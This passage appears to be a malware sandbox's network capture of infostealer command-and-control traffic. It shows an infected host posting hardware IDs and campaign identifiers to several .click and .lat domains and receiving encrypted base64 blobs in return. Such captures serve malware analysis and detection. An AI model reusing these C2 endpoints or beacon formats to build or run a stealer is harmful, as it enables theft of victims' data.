2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 58 45 77 77 55 79 2b 75 6c 55 47 47 48 78 4b 44 59 79 6d 32 42 53 71 75 47 68 41 57 65 7a 4e 45 38 75 66 58 49 70 34 6d 34 42 31 38 62 32 59 65 4b 4a 2f 72 47 4c 4a 51 46 73 31 58 5a 2f 45 4e 66 4f 30 57 4c 52 5a 76 4a 33 33 61 33 5a 59 4d 75 67 62 64 57 58 5a 49 4d 78 4a 63 6c 37 74 52 67 42 31 53 7a 53 5a 70 74 31 56 6b 35 52 68 59 45 58 42 70 49 70 79 65 67 48 48 4b 61 37 64 4a 52 51 45 2f 45 48 37 51 38 78 4c 46 55 45 7a 4e 4d 47 6e 32 46 69 36 6e 55 42 73 44 59 6d 35 45 38 75 76 56 49 35 67 71 39 77 78 56 63 52 68 46 61 35 36 6c 52 35 30 42 48 73 4d 6f 4a 76 46 4e 42 66 55 65 57 43 6f 76 61 57 4b 4d 6c 4a 73 52 6d 6a 4c 70 48 45 78 65 61 33 64 6d 6c 36 70 57 6d 77 64 52 7a 53 5a 70 74 31 56 6b 35 78 68 59 45 58 42 70 49 70 79 65 67 48 48 4b 61 37 64 Data Ascii: XEwwUy+ulUGGHxKDYym2BSquGhAWezNE8ufXIp4m4B18b2YeKJ/rGLJQFs1XZ/ENfO0WLRZvJ33a3ZYMugbdWXZIMxJcl7tRgB1SzSZpt1Vk5RhYEXBpIpyegHHKa7dJRQE/EH7Q8xLFUEzNMGn2Fi6nUBsDYm5E8uvVI5gq9wxVcRhFa56lR50BHsMoJvFNBfUeWCovaWKMlJsRmjLpHExea3dml6pWmwdRzSZpt1Vk5xhYEXBpIpyegHHKa7d
2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 31 35 76 30 6f 70 4b 6d 78 31 52 69 69 6f 4a 74 67 4d 2f 39 52 68 59 47 53 46 78 4f 73 33 47 79 79 6d 57 4f 36 73 63 51 45 68 6d 48 69 69 65 36 78 6a 4c 45 56 53 64 5a 53 61 32 57 54 71 37 57 46 67 4b 4c 7a 41 36 32 6f 79 44 64 39 64 38 39 56 73 43 44 32 46 54 65 6f 4b 74 51 35 30 54 47 62 4e 57 42 4b 4d 53 4c 4c 59 55 4b 52 68 6c 50 32 2f 50 33 4e 77 61 70 78 48 31 48 45 70 4d 5a 47 46 2b 6b 36 74 4f 6a 46 41 51 7a 58 42 70 36 56 55 52 70 31 45 49 46 69 46 6e 4f 73 43 4d 67 32 53 55 4c 75 41 4c 57 51 4d 68 53 6d 2f 51 74 41 36 53 55 45 6a 4e 4d 48 72 2f 56 53 37 31 44 6c 68 53 62 79 52 37 7a 38 4c 59 4e 6f 73 36 35 41 31 5a 43 42 68 75 52 59 4b 73 55 49 68 53 62 34 42 73 50 36 51 57 4c 4c 4a 6f 4a 6a 68 7a 4c 6d 72 50 6a 76 63 6a 6c 44 44 5a 4a 57 31 65 Data Ascii: 15v0opKmx1RiioJtgM/9RhYGSFxOs3GyymWO6scQEhmHiie6xjLEVSdZSa2WTq7WFgKLzA62oyDd9d89VsCD2FTeoKtQ50TGbNWBKMSLLYUKRhlP2/P3NwapxH1HEpMZGF+k6tOjFAQzXBp6VURp1EIFiFnOsCMg2SULuALWQMhSm/QtA6SUEjNMHr/VS71DlhSbyR7z8LYNos65A1ZCBhuRYKsUIhSb4BsP6QWLLJoJjhzLmrPjvcjlDDZJW1e

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.6	50185	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:22 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XQA79ARWIOGDUIQPWJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: cheapptaxysu.click
2024-12-19 09:12:22 UTC	12854	OUT	Data Raw: 2d 2d 58 51 41 37 39 41 52 57 49 4f 47 44 55 49 51 50 57 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 51 41 37 39 41 52 57 49 4f 47 44 55 49 51 50 57 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 51 41 37 39 41 52 57 49 4f 47 44 55 49 51 50 57 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 58 Data Ascii: --XQA79ARWIOGDUIQPWJContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--XQA79ARWIOGDUIQPWJContent-Disposition: form-data; name="pid"2--XQA79ARWIOGDUIQPWJContent-Disposition: form-data; name="lid"CZJvss----X
2024-12-19 09:12:39 UTC	1138	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e7ahu8nb2m6c5f80lmd2um03oo; expires=Mon, 14 Apr 2025 02:59:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JIkdwTFP1AVguSuMcksD%2FLcyI4rRT5cFq9RKW%2BD9VrLnhLmZ2BPdIoj4yDohmvKGO78BSsALGiiB%2FHB%2BAXNXhjejvX%2BxLDxOXfkxpbPAqXOrvLUf9XRtT3AbfUd8O%2B8QEJYiJss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645459f3cc34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1482&rtt_var=562&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13796&delivery_rate=1936339&cwnd=181&unsent_bytes=0&cid=5ad38cd2ddfe78d0&ts=16623&x=0"
2024-12-19 09:12:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	50184	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:22 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=P900NL5UD0NE2FHH83S User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1350 Host: lossekniyyt.click
2024-12-19 09:12:22 UTC	1350	OUT	Data Raw: 2d 2d 50 39 30 30 4e 4c 35 55 44 30 4e 45 32 46 48 48 38 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 39 30 30 4e 4c 35 55 44 30 4e 45 32 46 48 48 38 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 39 30 30 4e 4c 35 55 44 30 4e 45 32 46 48 48 38 33 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 39 5a 31 63 79 63 2d 2d 0d 0a Data Ascii: --P900NL5UD0NE2FHH83SContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--P900NL5UD0NE2FHH83SContent-Disposition: form-data; name="pid"1--P900NL5UD0NE2FHH83SContent-Disposition: form-data; name="lid"9Z1cyc--
2024-12-19 09:12:37 UTC	1136	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5dij2t6bd5122g3fqconvrb9mn; expires=Mon, 14 Apr 2025 02:59:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2FHVb0pKu0voznB7mvNZMGllCvUPJ9NIGRWkc0%2FL7cdyViguCG0S8bRcZuDc1aE1EIYQUXOlyFkcWGzGPagmGKARNiRYaXuoiD6%2FlMsknVu%2F%2FIl8lNQeuFrEWPIYn6VrlkKPCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46454648fd8cd7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=1999&rtt_var=758&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2269&delivery_rate=1435594&cwnd=237&unsent_bytes=0&cid=3518430cca2f1f94&ts=14534&x=0"
2024-12-19 09:12:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	50186	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:22 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SINNRU3KV1SZKL74MU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12864 Host: grannyejh.lat
2024-12-19 09:12:22 UTC	12864	OUT	Data Raw: 2d 2d 53 49 4e 4e 52 55 33 4b 56 31 53 5a 4b 4c 37 34 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 53 49 4e 4e 52 55 33 4b 56 31 53 5a 4b 4c 37 34 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 49 4e 4e 52 55 33 4b 56 31 53 5a 4b 4c 37 34 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 Data Ascii: --SINNRU3KV1SZKL74MUContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA300D57F9DDD37BE0C--SINNRU3KV1SZKL74MUContent-Disposition: form-data; name="pid"2--SINNRU3KV1SZKL74MUContent-Disposition: form-data; name="lid"yau6Na--69897
2024-12-19 09:12:38 UTC	1128	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mncrfj3fksq3p88p52f4rgvpv5; expires=Mon, 14 Apr 2025 02:59:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQx1e19%2BN3VfGVs%2FiS7b%2B0p0qzBPNLHOvDybJKt9i6cS1Mur7JDUKE5EWPz2IBjL9dj2o83taiArFnwmzbdNl8HC%2FwzpJDkB3Qx%2FrfkfraIokS7Nb9WBf4e%2BdE936u8K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645467ecd43a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1775&rtt_var=676&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13801&delivery_rate=1605277&cwnd=223&unsent_bytes=0&cid=ceca8f1eec8e042a&ts=15586&x=0"
2024-12-19 09:12:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.6	50188	172.67.180.113	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:24 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: treehoneyi.click
2024-12-19 09:12:24 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 72 41 47 78 53 46 2d 2d 53 75 70 70 6f 72 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=rAGxSF--Support&j=
2024-12-19 09:12:39 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bq8lmsbltoujfgegho11v7cj4c; expires=Mon, 14 Apr 2025 02:59:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NBmK6mZDuMwVcrWoJLh%2BpL72xgFaiMlZm4YznhApaVT4VxC1pTOVeXMqshjOt4LbiGW8rxD%2F3eM0J72SXoyute2lXKgqHwnVvVKK9HdDIVbAzKndFXUVXk6ewkw2nPgtha6x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464551ec011a0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1828&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=949&delivery_rate=1597374&cwnd=249&unsent_bytes=0&cid=34ca1ed8a77128b5&ts=15507&x=0"
2024-12-19 09:12:39 UTC	248	IN	Data Raw: 31 34 38 39 0d 0a 34 64 6f 58 79 71 2b 6c 73 62 78 4c 64 49 48 39 78 69 32 45 30 52 64 37 6a 61 53 78 31 42 66 53 65 70 67 68 71 49 65 6d 33 76 32 61 2b 47 48 6f 6c 5a 47 64 6e 6a 67 52 6f 38 65 79 58 2f 47 30 4f 31 6e 73 77 4a 50 75 63 62 4d 57 36 30 53 45 70 64 43 7a 33 39 75 38 64 71 62 63 77 4a 32 65 4c 67 79 6a 78 35 31 57 70 72 52 35 57 62 65 47 31 4c 35 31 73 78 62 36 51 4d 50 6f 31 72 4b 65 69 62 5a 77 6f 73 72 47 31 64 30 6e 47 65 53 59 6f 30 7a 75 76 33 34 57 35 63 6d 54 2b 44 57 33 41 4c 6f 62 69 73 72 44 71 70 79 73 75 32 53 68 6a 64 69 64 78 32 6b 52 37 39 2f 38 44 2b 57 30 64 52 66 72 77 4e 71 38 66 37 6f 65 2b 30 58 43 39 38 2b 34 6c 59 6d 34 63 36 50 41 7a 38 48 51 4c 52 37 76 6e 71 6c 4d 70 76 30 31 48 76 65 47 69 2f Data Ascii: 14894doXyq+lsbxLdIH9xi2E0Rd7jaSx1BfSepghqIem3v2a+GHolZGdnjgRo8eyX/G0O1nswJPucbMW60SEpdCz39u8dqbcwJ2eLgyjx51WprR5WbeG1L51sxb6QMPo1rKeibZwosrG1d0nGeSYo0zuv34W5cmT+DW3ALobisrDqpysu2Shjdidx2kR79/8D+W0dRfrwNq8f7oe+0XC98+4lYm4c6PAz8HQLR7vnqlMpv01HveGi/
2024-12-19 09:12:39 UTC	1369	IN	Data Raw: 59 6d 67 68 76 72 55 74 2f 6f 31 4c 72 66 6e 50 5a 73 36 4d 72 4c 6b 34 5a 70 48 75 2b 52 6f 55 7a 70 74 48 51 5a 2f 63 6e 54 74 58 32 34 48 50 42 4d 78 65 72 4b 74 70 69 4c 73 58 4b 6e 79 73 2f 56 30 53 70 57 72 64 2b 6a 56 36 62 72 4e 54 6e 2f 78 64 43 69 65 4b 46 59 35 51 33 54 70 63 4f 77 33 39 76 34 63 36 62 4d 79 74 50 4d 49 52 33 6f 6d 72 5a 45 37 37 35 34 47 65 4c 4d 33 4c 56 31 74 78 4c 77 54 4d 44 68 79 62 47 5a 67 37 67 31 35 6f 33 41 79 35 35 78 56 73 43 61 74 45 6a 71 70 54 63 6a 72 39 6d 64 72 7a 57 33 46 4c 6f 62 69 75 33 42 76 35 79 49 74 33 61 67 78 74 58 54 7a 43 38 62 35 6f 32 69 53 75 69 35 64 67 76 6c 79 4e 57 31 66 4c 73 52 2f 30 54 4f 70 59 72 38 6d 4a 76 34 4c 65 6a 73 79 74 6a 53 49 77 48 6a 33 37 73 42 2f 2f 4e 79 46 61 2b 65 6b Data Ascii: YmghvrUt/o1LrfnPZs6MrLk4ZpHu+RoUzptHQZ/cnTtX24HPBMxerKtpiLsXKnys/V0SpWrd+jV6brNTn/xdCieKFY5Q3TpcOw39v4c6bMytPMIR3omrZE7754GeLM3LV1txLwTMDhybGZg7g15o3Ay55xVsCatEjqpTcjr9mdrzW3FLobiu3Bv5yIt3agxtXTzC8b5o2iSui5dgvlyNW1fLsR/0TOpYr8mJv4LejsytjSIwHj37sB//NyFa+ek
2024-12-19 09:12:39 UTC	1369	IN	Data Raw: 59 74 41 50 4e 2f 59 54 6b 33 36 6d 37 59 61 76 48 68 65 62 64 4a 78 6a 6b 69 65 52 51 71 4b 6f 31 48 75 4f 47 69 2f 5a 34 73 52 44 38 55 63 58 6f 78 37 4b 52 6a 4c 31 36 6f 4d 33 48 33 74 73 74 48 65 69 63 71 55 76 30 75 58 55 52 36 73 66 5a 76 44 58 2b 57 50 31 62 69 72 32 45 6a 59 69 49 2b 6b 43 72 77 38 6e 55 79 47 6b 4a 72 59 62 6b 53 4f 72 7a 4c 56 6e 69 7a 74 61 7a 65 72 45 53 39 45 62 41 36 63 79 79 6e 4a 47 33 63 61 6a 42 7a 39 6e 54 4a 78 4c 72 6c 71 39 45 34 4c 4e 30 45 36 2b 49 6b 37 46 74 38 45 43 36 64 38 33 70 79 62 50 64 74 72 74 37 70 73 72 52 6b 38 46 6e 44 36 4f 59 71 41 2b 2b 38 33 6b 51 37 38 33 5a 73 6e 57 33 46 66 39 41 7a 65 62 4a 75 35 57 4e 76 33 47 6b 78 4d 72 56 33 69 34 53 35 6f 32 68 52 75 71 2f 4e 56 65 76 77 63 76 32 4c 66 Data Ascii: YtAPN/YTk36m7YavHhebdJxjkieRQqKo1HuOGi/Z4sRD8UcXox7KRjL16oM3H3tstHeicqUv0uXUR6sfZvDX+WP1bir2EjYiI+kCrw8nUyGkJrYbkSOrzLVniztazerES9EbA6cyynJG3cajBz9nTJxLrlq9E4LN0E6+Ik7Ft8EC6d83pybPdtrt7psrRk8FnD6OYqA++83kQ783ZsnW3Ff9AzebJu5WNv3GkxMrV3i4S5o2hRuq/NVevwcv2Lf
2024-12-19 09:12:39 UTC	1369	IN	Data Raw: 69 72 32 45 74 5a 61 52 74 6e 75 68 77 4d 48 62 32 53 63 62 36 4a 6d 76 53 4f 47 31 65 42 48 69 77 39 43 33 63 62 6f 4b 2b 55 6a 41 36 4d 37 38 30 63 4f 2f 62 65 69 56 68 2f 54 53 41 41 62 34 6a 62 49 50 2b 66 31 73 57 65 6a 4b 6b 2b 34 31 73 78 66 7a 54 4d 4c 74 79 37 4f 62 6a 62 35 7a 70 63 6a 49 32 63 77 68 47 4f 36 55 71 30 54 30 73 33 67 64 34 38 4c 62 76 58 2f 77 56 72 70 45 30 71 57 63 2f 4b 71 4f 74 33 57 72 32 34 66 4d 6b 44 42 57 35 4a 50 6b 46 36 61 2f 65 78 6e 67 79 74 2b 39 66 62 45 55 39 45 54 50 37 4d 79 30 6a 59 4b 38 66 61 6e 44 79 4e 4c 61 4c 42 50 6e 6d 4b 42 4a 36 66 4d 37 57 65 6a 65 6b 2b 34 31 6e 7a 2f 50 41 65 76 66 68 4b 50 52 6d 76 68 79 70 49 32 66 6b 39 49 71 47 75 75 51 6f 6b 62 71 75 58 77 53 34 38 33 58 75 6e 79 31 48 76 74 Data Ascii: ir2EtZaRtnuhwMHb2Scb6JmvSOG1eBHiw9C3cboK+UjA6M780cO/beiVh/TSAAb4jbIP+f1sWejKk+41sxfzTMLty7Objb5zpcjI2cwhGO6Uq0T0s3gd48LbvX/wVrpE0qWc/KqOt3Wr24fMkDBW5JPkF6a/exngyt+9fbEU9ETP7My0jYK8fanDyNLaLBPnmKBJ6fM7Wejek+41nz/PAevfhKPRmvhypI2fk9IqGuuQokbquXwS483Xuny1Hvt
2024-12-19 09:12:39 UTC	910	IN	Data Raw: 72 75 57 6b 62 5a 34 70 38 58 50 32 74 38 74 45 2b 36 5a 71 45 58 6e 74 48 73 58 35 34 61 64 39 6e 4b 6f 57 4b 49 44 36 2f 58 66 72 6f 6d 4f 6d 58 69 6e 6a 64 69 64 78 32 6b 52 37 39 2f 38 44 2b 2b 68 63 52 54 39 7a 39 53 34 65 72 4d 4b 2b 30 37 42 39 38 4f 7a 6d 34 53 30 63 36 66 4c 78 74 62 55 4a 52 48 6d 6c 4b 74 44 70 76 30 31 48 76 65 47 69 2f 5a 62 75 77 76 74 51 4d 54 75 30 71 66 66 6e 50 5a 73 36 4d 72 4c 6b 34 5a 70 46 65 69 55 6f 45 2f 71 73 33 45 55 37 39 54 63 73 58 4b 35 45 2b 68 4a 7a 65 4c 50 74 4a 53 4d 76 6d 65 6b 77 39 58 57 7a 44 74 57 72 64 2b 6a 56 36 62 72 4e 53 2f 6f 31 73 4f 31 4e 34 45 4f 2b 56 58 42 36 4d 6a 38 67 4d 32 68 4e 61 2f 42 68 34 75 65 4c 78 6e 71 6e 4b 74 4f 37 37 39 34 48 4f 62 44 30 72 42 78 75 68 4c 36 52 63 7a 6b Data Ascii: ruWkbZ4p8XP2t8tE+6ZqEXntHsX54ad9nKoWKID6/XfromOmXinjdidx2kR79/8D++hcRT9z9S4erMK+07B98Ozm4S0c6fLxtbUJRHmlKtDpv01HveGi/ZbuwvtQMTu0qffnPZs6MrLk4ZpFeiUoE/qs3EU79TcsXK5E+hJzeLPtJSMvmekw9XWzDtWrd+jV6brNS/o1sO1N4EO+VXB6Mj8gM2hNa/Bh4ueLxnqnKtO7794HObD0rBxuhL6Rczk
2024-12-19 09:12:39 UTC	1369	IN	Data Raw: 33 34 39 33 0d 0a 74 30 75 48 2b 57 55 70 30 58 70 74 48 4d 64 37 38 33 55 75 48 4f 31 45 2f 4d 44 68 4b 58 44 70 4e 2f 62 2b 46 4f 4c 33 39 58 68 30 43 6f 4e 6f 34 44 71 56 71 61 30 65 56 6d 33 68 74 69 2b 65 71 49 64 38 30 76 4f 37 4d 53 34 6c 59 36 2f 64 61 33 41 77 74 66 51 4c 52 48 6a 6b 36 74 49 37 72 78 78 47 65 43 47 6e 66 5a 79 71 46 69 69 41 2b 72 75 30 70 32 52 69 4b 6f 31 74 34 50 65 6b 39 6b 6c 56 72 76 66 71 6b 62 6e 75 33 73 56 35 38 4c 42 74 6e 36 35 46 2f 74 4d 79 75 62 46 74 70 65 52 76 6e 57 6a 78 63 44 62 32 69 63 45 34 70 44 6b 41 61 61 30 62 56 6d 33 68 75 4b 67 63 72 63 58 75 47 72 4e 2f 73 57 32 6e 49 69 30 4e 62 65 44 33 70 50 5a 4a 56 61 37 33 36 6c 44 36 37 64 6e 46 65 2f 47 32 72 46 2f 6f 68 66 31 54 73 6e 6c 77 61 36 65 6b 62 Data Ascii: 3493t0uH+WUp0XptHMd783UuHO1E/MDhKXDpN/b+FOL39Xh0CoNo4DqVqa0eVm3hti+eqId80vO7MS4lY6/da3AwtfQLRHjk6tI7rxxGeCGnfZyqFiiA+ru0p2RiKo1t4Pek9klVrvfqkbnu3sV58LBtn65F/tMyubFtpeRvnWjxcDb2icE4pDkAaa0bVm3huKgcrcXuGrN/sW2nIi0NbeD3pPZJVa736lD67dnFe/G2rF/ohf1Tsnlwa6ekb
2024-12-19 09:12:39 UTC	1369	IN	Data Raw: 77 4e 54 56 4f 78 33 78 6c 4b 78 4d 36 4c 74 38 47 65 48 47 30 72 74 31 38 46 61 36 52 4e 4b 6c 6e 50 79 36 6f 4b 39 6a 6f 6f 2f 6b 78 4d 67 6a 45 65 2b 4a 72 30 37 6c 70 58 67 4a 72 34 69 54 70 33 4b 68 57 4b 4a 56 32 76 4c 44 6f 39 47 61 2b 48 4b 6b 6a 5a 2b 54 31 53 59 59 37 70 53 67 52 75 4f 37 64 68 7a 71 7a 4e 2b 36 64 4c 67 52 38 45 62 50 34 38 36 2f 6b 59 79 35 65 61 7a 45 79 64 71 65 5a 31 62 6b 68 2b 51 58 70 6f 56 6c 48 76 66 4c 77 2f 52 48 73 77 6e 72 56 73 66 31 77 76 36 77 67 4c 52 32 72 63 72 58 6b 38 46 6e 44 36 4f 59 71 41 2b 2b 38 33 55 64 34 38 58 55 75 48 71 39 46 2f 31 49 78 65 2f 4b 72 70 43 47 73 48 6d 67 77 4e 58 5a 31 44 73 66 36 70 4b 71 52 2f 53 77 4e 56 65 76 77 63 76 32 4c 66 41 71 38 45 44 47 38 38 6d 7a 33 35 7a 32 62 4f 6a Data Ascii: wNTVOx3xlKxM6Lt8GeHG0rt18Fa6RNKlnPy6oK9joo/kxMgjEe+Jr07lpXgJr4iTp3KhWKJV2vLDo9Ga+HKkjZ+T1SYY7pSgRuO7dhzqzN+6dLgR8EbP486/kYy5eazEydqeZ1bkh+QXpoVlHvfLw/RHswnrVsf1wv6wgLR2rcrXk8FnD6OYqA++83Ud48XUuHq9F/1Ixe/KrpCGsHmgwNXZ1Dsf6pKqR/SwNVevwcv2LfAq8EDG88mz35z2bOj
